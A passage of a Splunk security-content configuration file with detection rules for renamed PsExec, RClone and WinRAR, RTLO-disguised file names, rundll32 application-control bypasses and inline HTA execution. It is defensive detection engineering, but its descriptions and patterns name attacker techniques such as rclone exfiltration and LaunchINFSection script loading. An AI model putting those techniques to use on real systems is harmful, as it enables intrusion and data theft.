renamed instances of `PsExec.exe` being utilized on an endpoint. Most instances, it is highly probable to capture `Psexec.exe` or other SysInternal utility usage with the command-line argument of `-accepteula`. During triage, validate this is the legitimate version of `PsExec` by reviewing the PE metadata. In addition, review parallel processes for further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives should be present. It is possible some third party applications may use older versions of PsExec, filter as needed. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed PSExec - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed PSExec - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "DHS Report TA18-074A", "HAFNIUM Group", "DarkSide Ransomware", "Active Directory Lateral Movement", "CISA AA22-320A", "Sandworm Tools", "BlackByte Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name!=psexec.exe OR Processes.process_name!=psexec64.exe) AND Processes.original_file_name=psexec.c by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_psexec_filter` [ESCU - Detect Renamed RClone - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the usage of `rclone.exe`, renamed, being used to exfiltrate data to a remote destination. RClone has been used by multiple ransomware groups to exfiltrate data. In many instances, it will be downloaded from the legitimate site and executed accordingly. During triage, isolate the endpoint and begin to review parallel processes for additional behavior. At this stage, the adversary may have staged data to be exfiltrated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the usage of `rclone.exe`, renamed, being used to exfiltrate data to a remote destination. RClone has been used by multiple ransomware groups to exfiltrate data. In many instances, it will be downloaded from the legitimate site and executed accordingly. During triage, isolate the endpoint and begin to review parallel processes for additional behavior. At this stage, the adversary may have staged data to be exfiltrated. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this analytic identifies renamed instances of `rclone.exe`. Filter as needed if there is a legitimate business use case. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed RClone - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed RClone - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1020"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=rclone.exe AND Processes.process_name!=rclone.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_rclone_filter` [ESCU - Detect Renamed WinRAR - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analtyic identifies renamed instances of `WinRAR.exe`. In most cases, it is not common for WinRAR to be used renamed, however it is common to be installed by a third party application and executed from a non-standard path. During triage, validate additional metadata from the binary that this is `WinRAR`. Review parallel processes and file modifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analtyic identifies renamed instances of `WinRAR.exe`. In most cases, it is not common for WinRAR to be used renamed, however it is common to be installed by a third party application and executed from a non-standard path. During triage, validate additional metadata from the binary that this is `WinRAR`. Review parallel processes and file modifications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. It is possible third party applications use renamed instances of WinRAR. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Renamed WinRAR - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Collection and Staging", "CISA AA22-277A"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Renamed WinRAR - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "CISA AA22-277A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=WinRAR.exe (Processes.process_name!=rar.exe OR Processes.process_name!=winrar.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_renamed_winrar_filter` [ESCU - Detect RTLO In File Name - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that includes the full command line of the process being launched on your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = Implementation in regions that use right to left in native language. action.escu.creation_date = 2023-04-26 action.escu.modification_date = 2023-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect RTLO In File Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = Suspicious RTLO detected in $file_name$ on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect RTLO In File Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.notable.param.rule_title = Detect RTLO In File Name action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_create_time) as file_create_time from datamodel=Endpoint.Filesystem where Filesystem.file_name!=unknown by Filesystem.dest Filesystem.user Filesystem.process_id Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex file_name = "\\x{202E}" | rex field=file_name "(?.+)(?\\x{202E})(?.+)" | eval file_name_with_RTLO=file_name | eval file_name=RTLO_file_1.RTLO_file_2 | fields - RTLO* | `detect_rtlo_in_file_name_filter` [ESCU - Detect RTLO In Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Implementation in regions that use right to left in native language. action.escu.creation_date = 2023-04-26 action.escu.modification_date = 2023-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect RTLO In Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments"] action.risk = 1 action.risk.param._risk_message = Suspicious RTLO detected in $process_name$ on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect RTLO In Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E) RTLO. This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. action.notable.param.rule_title = Detect RTLO In Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process!=unknown AND Processes.action=allowed by Processes.dest Processes.user Processes.original_file_name Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | regex process="\\x{202E}" | rex field=process "(?.+)(?\\x{202E})(?.+)" | eval process_with_RTLO=process | eval process=RTLO_command_1.RTLO_command_2 | fields - RTLO* | `detect_rtlo_in_process_filter` [ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use advpack.dll or ieadvpack.dll, triggering a false positive. action.escu.creation_date = 2021-02-04 action.escu.modification_date = 2021-02-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - advpack action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter` [ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use setupapi triggering a false positive. action.escu.creation_date = 2021-02-04 action.escu.modification_date = 2021-02-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - setupapi action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*setupapi* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___setupapi_filter` [ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use syssetup.dll, triggering a false positive. action.escu.creation_date = 2021-02-04 action.escu.modification_date = 2021-02-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading syssetup.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk. action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - syssetup action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*syssetup* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___syssetup_filter` [ESCU - Detect Rundll32 Inline HTA Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) 